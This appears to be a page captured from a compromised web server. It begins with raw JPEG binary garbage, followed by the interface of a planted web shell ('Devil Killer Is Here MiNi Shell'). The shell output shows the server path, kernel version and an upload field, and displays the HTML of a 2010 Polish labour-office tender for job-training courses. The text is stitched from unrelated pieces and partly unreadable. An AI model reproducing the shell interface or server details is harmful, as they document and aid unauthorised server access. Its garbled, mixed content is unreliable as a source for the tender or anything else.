JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100519/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100519/136164-N-2010.html

<p class="kh_header"><b>Gorzów Wielkopolski: organizacja szkoleń dla bezrobotnych i poszukujących pracy  (znak AG-0202-3/2010)</b><br>
<b>Numer ogłoszenia: 136164 - 2010; data zamieszczenia: 19.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Walczaka 110, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 0-95 736 06 43, faks 0-95 736 06 69.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.gorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> organizacja szkoleń dla bezrobotnych i poszukujących pracy  (znak AG-0202-3/2010).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń dla osób bezrobotnych i poszukujących pracy m.in.: młodzieży poniżej 25 roku życia lub absolwentów szkół wyższych do 27 lat, osób długotrwale bezrobotnych, pow. 50 roku życia, bezrobotnych bez kwalifikacji zawodowych, bezrobotnych samotnie wychowujących co najmniej jedno dziecko do 18 roku życia oraz osób niepełnosprawnych, współfinansowanych ze środków Funduszu Pracy, PFRON, Unii Europejskiej - Europejskiego Funduszu Społecznego w zakresie szkoleń o następującej tematyce:
1)	Kurs księgowo - kadrowy (10 osób)
2)	Kurs florystyczny z obsługą kasy fiskalnej i komputera i decoupage (20 osób)
3)	Kurs telemarketer z obsługą komputera (10 osób)
4)	Kurs fryzjerski z wykorzystaniem nowoczesnych technik fryzjerskich (10 osób)
5)	Kurs kadry i płace (10 osób).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca posiada wpis do rejestru instytucji szkoleniowych prowadzony przez wojewódzki urząd pracy właściwy ze względu na siedzibę wykonawcy (podstawa prawna: ustawa o promocji zatrudnienia i instytucjach rynku pracy - Dz. U. Nr 69, poz. 415 z 2008 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert przeszkolił 100 osób bez względu na przedmiot zamówienia oraz przedstawi 1 referencję potwierdzającą realizację szkolenia zgodnie z przedmiotem zamówienia. W przypadku składania oferty wspólnej wykonawcy składają wspólny wykaz wykonanych prac. Warunek zostanie uznany za spełniony, jeśli wykonawcy składający ofertę wspólną będą spełniać go łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże  pomieszczenia, samodzielne stanowiska szkoleniowe, niezbędny sprzęt, materiały dydaktyczne, biurowe i piśmiennicze przechodzące na własność uczestnika, odzież ochronną zgodnie z przepisami BHP i ppoż, itp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże minimum 2 wykładowców/instruktorów, posiadających przygotowanie zawodowe i doświadczenie zawodowe odpowiadające rodzajowi prowadzonych zajęć oraz każdy wskazany wykładowca/instruktor do realizacji zamówienia w zał. 5 przeszkolił co najmniej  50 osób w ciągu ostatnich 3 latach zgodnie z tematyką zajęć przewidzianych do realizacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony po złożeniu oświadczenia zał. 3 siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Odpowiednie pełnomocnictwa, tylko w sytuacjach określonych w Rozdziale I pkt 5 siwz lub w przypadku składania oferty wspólnej (Rodział III pkt 1 siwz);
b)	Kopie dokumentów potwierdzających jakość usług szkoleniowych (m.in. certyfikaty jakości usług szkoleniowych, akredytacje Kuratora Oświaty) potwierdzone za zgodność z oryginałem.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - kwalifikacje kadry dydaktycznej - 20</li>
<li>3 - certyfikat jakości usług szkoleniowych - 10</li>
<li>4 - program szkolenia - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.gorzow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Walczaka 110 66-400 Gorzów Wielkopolski, pok. 113.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2010 godzina 12:00, miejsce: Powiatowy Urząd Pracy w Gorzowie Wlkp., ul. Walczaka 110, sekretariat pok. 203.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie finansowane będzie w ramach środków Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki - Projekt Kameleon.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs księgowo - kadrowy (10 osób).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	powinien być opracowany zgodnie z obowiązującymi w tym zakresie przepisami prawa oraz musi uwzględniać następujące zagadnienia: teoria rachunkowości, ewidencja środków pieniężnych, ewidencja rozrachunków i kapitałów, księgowość zarobkowa, księgowość materiałowa Liczba osób do przeszkolenia - 10 osób 
-	Termin wykonania zamówienia: od dnia podpisania umowy do 30.11.2010 r., rozpoczęcie II kwartał, dokładny termin będzie ustalony po wyborze jednostki szkoleniowej. 
-	Czas trwania kursu do 8 tygodni dla grupy (zajęcia w ciągu dnia nie mogą przekroczyć 8 godzin, 1 godzina zajęć teoretycznych trwa 45 minut + 15 min. przerwa lekcyjna, a zajęć praktycznych 60 minut, wykonawca zobowiązany jest zapewnić przerwy pomiędzy lekcjami, min. 30 godzin zegarowych w tygodniu).
-	Ilość godzin szkolenia - min. 300 godzin na 1 uczestnika, w tym:
-	Ilość godzin szkolenia teoretycznego - min. 120 godzin
-	Ilość godzin szkolenia praktycznego - min. 180 godzin.
-	Miejsce przeprowadzenia szkoleń - Gorzów Wlkp. 
-	Celem szkolenia jest nabycie wiedzy i umiejętności niezbędnych do podjęcia zatrudnienia na stanowisku pracownika biurowego do spraw księgowo-kadrowych oraz zdobycie stosownych zaświadczeń. 
-	Program szkolenia powinien zawierać następujące elementy: Program szkolenia i towarowa, ewidencja rzeczowych i finansowych składników majątku trwałego, ewidencja kosztów i produktów, naliczanie i księgowanie płac, fakturowanie, bilans księgowy, zasady organizacji i prowadzenia spraw kadrowych, współpraca z ZUS i Urzędem Skarbowy, prawo z uwzględnieniem prawa pracy i prawa podatkowego, obsługa komputera od podstaw z wykorzystaniem programów edytorskich Windows, Word, Excel, Internet, obsługa programu komputerowego finansowo-księgowego, obsługa programu kadrowego, obsługa urządzeń biurowych takich jak: fax, ksero, itp.
-	Wykonawca musi zapewnić dla każdego uczestnika szkolenia samodzielne stanowiska szkoleniowe wyposażone w niezbędny sprzęt, m.in. min. 10 stanowisk komputerowych z oprogramowaniem księgowo-kadrowym, materiały dydaktyczne, biurowe i piśmiennicze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. kwalifikacje kadry dydaktycznej - 20</li>
<li>3. certyfikat jakości usług szkoleniowych - 10</li>
<li>4. program szkolenia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs florystyczny z obsługą kasy fiskalnej i komputera i decoupage (20 osób).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Liczba osób do przeszkolenia - 2 grupy po 10 osób  
-	Termin wykonania zamówienia:  od dnia podpisania umowy do 30.11.2010 r., rozpoczęcie II i III kwartał, dokładny termin będzie ustalony po wyborze jednostki szkoleniowej. 
-	Czas trwania kursu do 6 tygodni dla grupy 10 osobowej (zajęcia w ciągu dnia nie mogą przekroczyć 8 godzin dziennie, 1 godzina zajęć trwa 45 minut + 15 minut przerwy, wykonawca zobowiązany jest zapewnić w trakcie szkolenia przerwy w ciągu dnia, min. 30 godzin zegarowych w tygodniu),
-	Ilość godzin szkolenia ogółem - min. 210, w tym:
-	Ilość godzin szkolenia teoretycznego - min. 55 godzin
-	Ilość godzin szkolenia praktycznego - min. 155.
-	Miejsce przeprowadzenia szkoleń - Gorzów Wlkp. 
-	Celem szkolenia jest nabycie wiedzy i umiejętności niezbędnych do podjęcia zatrudnienia na stanowisku sprzedawcy - florysty, bukieciarza, itp. lub rozpoczęcia prowadzenia własnej działalności gospodarczej w tym zakresie oraz zdobycie stosownych uprawnień, zaświadczeń.
-	Program szkolenia powinien uwzględniać następującą tematykę: zasady układania kompozycji kwiatowych, florystyka okolicznościowa, florystyka ślubna, florystyka pogrzebowa, zasady opakowywania kwiatów oraz prezentów, technika decoupage, w tym: stosowane preparaty, przygotowanie powierzchni do dekoracji, praca z jednoskładnikowym crackle, komponowanie motywu i klejenie, wykonywanie kolorowych napisów, zastosowanie dwuskładnikowego crackle, wykończenie pracy, zagadnienia dotyczące sprzedaży kwiatów i obsługi klienta, obsługa kasy fiskalnej, obsługa komputera od podstaw z wykorzystaniem programów edytorskich  m.in. WORD, EXCEL, internet, itp. Przy jego realizacji konieczne jest, aby każdy uczestnik szkolenia miał możliwość korzystania z nowoczesnych metod zdobywania wiedzy, m.in. poprzez dostęp do komputera, internetu. 
-	Wykonawca musi zapewnić dla każdego uczestnika szkolenia samodzielne stanowiska szkoleniowe wyposażone w niezbędny sprzęt,  m.in. samodzielne zestawy komputerowe z oprogramowaniem (min. 10 szt.) oraz kasy fiskalne (10 szt.), kwiaty i materiały florystyczne, materiały do decoupage, itp. oraz materiały dydaktyczne, biurowe i piśmiennicze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. kwalifikacje kadry dydaktycznej - 20</li>
<li>3. certyfikat jakości usług szkoleniowych - 10</li>
<li>4. program szkolenia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs telemarketer z obsługą komputera (10 osób).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Liczba osób do przeszkolenia - 10 osób 
-	Termin wykonania zamówienia: od dnia podpisania umowy do 30.11.2010 r., rozpoczęcie II kwartał, dokładny termin będzie ustalony po wyborze jednostki szkoleniowej. 
-	Czas trwania kursu do 5 tygodni dla grupy (zajęcia w ciągu dnia nie mogą przekroczyć 8 godzin, 1 godzina zajęć teoretycznych trwa 45 minut + 15 minut przerwa lekcyjna, a zajęć praktycznych 60 minut, wykonawca zobowiązany jest zapewnić przerwy pomiędzy lekcjami, min. 30 godzin zegarowych w tygodniu).
-	Ilość godzin szkolenia ogółem - min. 150 godzin na 1 uczestnika, w tym:
-	Ilość godzin szkolenia teoretycznego - min. 30 godzin
-	Ilość godzin szkolenia praktycznego - min. 120 godzin.
-	Miejsce przeprowadzenia szkoleń - Gorzów Wlkp. 
-	Celem szkolenia jest nabycie wiedzy i umiejętności niezbędnych do podjęcia zatrudnienia na stanowisku telemarketera, specjalisty ds. marketingu, przedstawiciela handlowego,  oraz zdobycie stosownych zaświadczeń. 
-	Program szkolenia powinien zawierać następujące elementy: zasady telemarketingu, przygotowanie do rozmowy telefonicznej (plan działań, praca nad głosem, kontrola głosu, wyrażanie emocji), budowa i formułowanie przekazu, sprzedaż przez telefon, bariery efektywnego komunikowania się w sprzedaży, telemarketer i handlowiec w zespole, połączenie rozmowy telefonicznej i wysyłki, sprzedaż telefoniczna od strony sprzedawcy, sprzedaż telefoniczna od strony klienta, efektywne słuchanie, techniki zadawania pytań, techniki sprzedaży i negocjacji wykorzystywane w telemarketingu, mierzenie efektywności działań telemarketingowych, obsługa komputera program Windows, Pakiet  Office, Word, Excel, Internet, email) oraz urządzeń biurowych (telefon, fax. skaner, kopiarka).
-	Wykonawca musi zapewnić dla każdego uczestnika szkolenia samodzielne stanowiska szkoleniowe wyposażone w niezbędny sprzęt, m.in. min. 10 stanowisk komputerowych z oprogramowaniem, telefon, fax, skaner, kopiarkę, materiały dydaktyczne, biurowe i piśmiennicze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. kwalifikacje kadry dydaktycznej - 20</li>
<li>3. certyfikat jakości usług szkoleniowych - 10</li>
<li>4. program szkolenia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs fryzjerski z wykorzystaniem nowoczesnych technik fryzjerskich (10 osób).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Liczba osób do przeszkolenia - 10 osób 
-	Termin wykonania zamówienia: od dnia podpisania umowy do 30.11.2010 r., rozpoczęcie II kwartał, dokładny termin będzie ustalony po wyborze jednostki szkoleniowej. 
-	Czas trwania kursu do 8 tygodni dla grupy (zajęcia w ciągu dnia nie mogą przekroczyć 8 godzin, 1 godzina zajęć teoretycznych trwa 45 minut + 15 minut przerwa lekcyjna, a zajęć praktycznych 60 minut, wykonawca zobowiązany jest zapewnić przerwy pomiędzy lekcjami, min. 30 godzin zegarowych w tygodniu).
-	Ilość godzin szkolenia ogółem - min. 300 godzin na 1 uczestnika, w tym:
-	Ilość godzin szkolenia teoretycznego - min. 60 godzin
-	Ilość godzin szkolenia praktycznego - min. 240 godzin.
-	Miejsce przeprowadzenia szkoleń - Gorzów Wlkp. 
-	Celem szkolenia jest nabycie lub uzupełnienie wiedzy i umiejętności niezbędnych do podjęcia zatrudnienia na stanowisku fryzjera oraz zdobycie stosownych zaświadczeń. Szkoleniem planuje objąć się osoby, które posiadają przerwę w zatrudnieniu na stanowisku fryzjera lub osoby nieposiadające stażu pracy na tym stanowisku z wyłączeniem absolwentów 2009/2010 r.
-	Program szkolenia powinien zawierać następujące elementy: zasady BHP na stanowisku fryzjera, higiena, produkty i narzędzia stosowane w fryzjerstwie, budowa włosów, skóry i właściwości, dobór fryzury do kształtu twarzy, mycie głowy, masaż głowy, podstawy strzyżeń, techniki fryzjerskie, strzyżenie damskie (klasyczne i awangardowe) i męskie, strzyżenie maszynką, strzyżenie grzywek, cieniowanie, stopniowanie, przerzedzanie, punktowanie, cieniowanie techniką degażowania, pikowania i ślizg, pielęgnacja włosów i skóry głowy, stylizacja fryzury (podstawy koloryzacji, dobór technik strzyżenia i koloryzacji do kształtu i rodzaju włosów), modelowanie za pomocą szczotki i suszarki, prostownicy, lokówki, karbownicy, wyciskanie fal, loczki, spirale, stojące, płaskie, nawijanie włosów na wałki, podstawy trwałej ondulacji,  tapirowanie, koloryzacja włosów, (paleta kolorów, baza naturalna, zgodność refleksów, techniki i rodzaje koloryzacji, farbowanie odrostów i włosów siwych, dekoloryzacja, zmiękczanie włosów, Baleyage, pasemka, Flash, tonowanie, zasady komunikacji i profesjonalnej obsługi klienta w salonie fryzjerski, poznanie różnych charakterów klientów, zachowań i ich potrzeb, itp.
